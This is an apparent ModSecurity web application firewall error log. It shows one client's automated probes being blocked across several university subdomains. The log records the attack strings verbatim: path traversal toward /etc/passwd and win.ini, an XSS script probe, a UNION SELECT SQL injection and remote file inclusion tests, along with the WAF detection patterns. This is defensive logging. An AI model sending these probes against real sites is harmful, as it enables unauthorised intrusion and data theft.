[Tue Aug 29 11:41:18.632630 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAc0NcEAAAAM"]
[Tue Aug 29 11:41:18.655324 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcbSEAAAAAv"]
[Tue Aug 29 11:41:18.668025 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcyp3MAAAAK"]
[Tue Aug 29 11:41:18.684469 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAYf-QoAAAAD"]
[Tue Aug 29 11:41:19.355793 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAc0NcQAAAAM"]
[Tue Aug 29 11:41:19.357126 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAc2dQgAAAAN"]
[Tue Aug 29 11:41:19.357264 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAYf-Q0AAAAD"]
[Tue Aug 29 11:41:19.371541 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcyp3cAAAAK"]
[Tue Aug 29 11:41:19.385465 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO1278Co-f0AAAYf-Q4AAAAD"]
[Tue Aug 29 11:41:19.385702 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAcbSEUAAAAv"]
[Tue Aug 29 11:41:19.440736 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0NcYAAAAM"]
[Tue Aug 29 11:41:19.442507 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAActbLcAAAAH"]
[Tue Aug 29 11:41:19.442968 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcoNVYAAAAF"]
[Tue Aug 29 11:41:19.443542 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcqJMIAAAAG"]
[Tue Aug 29 11:41:19.453677 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAaZ9qsAAAAo"]
[Tue Aug 29 11:41:19.484152 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcqJMMAAAAG"]
[Tue Aug 29 11:41:19.485307 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcyp3kAAAAK"]
[Tue Aug 29 11:41:19.487223 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAcoNVcAAAAF"]
[Tue Aug 29 11:41:19.504325 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAc0NcgAAAAM"]
[Tue Aug 29 11:41:19.954889 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0Nc8AAAAM"]
[Tue Aug 29 11:41:20.393709 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdAAAAAM"]
[Tue Aug 29 11:41:20.397098 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAcqJMYAAAAG"]
[Tue Aug 29 11:41:20.440609 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAc4EmoAAAAP"]
[Tue Aug 29 11:41:20.449486 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAcqJMgAAAAG"]
[Tue Aug 29 11:41:20.540581 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc4EmsAAAAP"]
[Tue Aug 29 11:41:20.603293 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAcyp4UAAAAK"]
[Tue Aug 29 11:41:20.605025 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAaZ9rEAAAAo"]
[Tue Aug 29 11:41:20.637659 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAaZ9rIAAAAo"]
[Tue Aug 29 11:41:20.643091 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc0NdYAAAAM"]
[Tue Aug 29 11:41:20.646106 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc4Em4AAAAP"]
[Tue Aug 29 11:41:20.687412 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAc0NdgAAAAM"]
[Tue Aug 29 11:41:20.694347 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO128MCo-f0AAAcyp4cAAAAK"]
[Tue Aug 29 11:41:20.713193 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdkAAAAM"]
[Tue Aug 29 11:41:20.717327 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcyp4gAAAAK"]
[Tue Aug 29 11:41:20.735719 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdoAAAAM"]
[Tue Aug 29 11:41:20.747170 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAaZ9rUAAAAo"]
[Tue Aug 29 11:41:20.763263 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcyp4oAAAAK"]
